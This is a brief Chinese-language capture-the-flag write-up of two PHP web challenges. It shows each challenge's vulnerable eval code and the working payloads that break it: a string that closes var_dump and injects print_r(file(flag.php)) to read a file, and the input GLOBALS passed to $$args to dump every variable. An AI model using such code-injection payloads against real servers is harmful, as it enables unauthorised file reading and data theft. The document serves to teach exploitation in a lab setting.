案例一
URL:http://120.24.86.145:8003/
代碼
<?php include "waf.php"; include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?>
其實就是拼接eval
可構造如下語句:
1);print_r(file(flag.php));//
到了代碼里就是
eval( "var_dump(1);print_r(file(flag.php));//);");
案例二
URL:http://120.24.86.145:8004/index1.php
flag In the variable ! <?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ die("args error!"); } eval("var_dump($$args);"); } ?>
這個可以注意一下eval很明顯$$.首先他說如果不符合那個正則就die。\w的意思是所有的字母。也就是說$args必須要是字母才行。倘若是GLOBALS到eval就是eval("var_dump($GLOBALS);");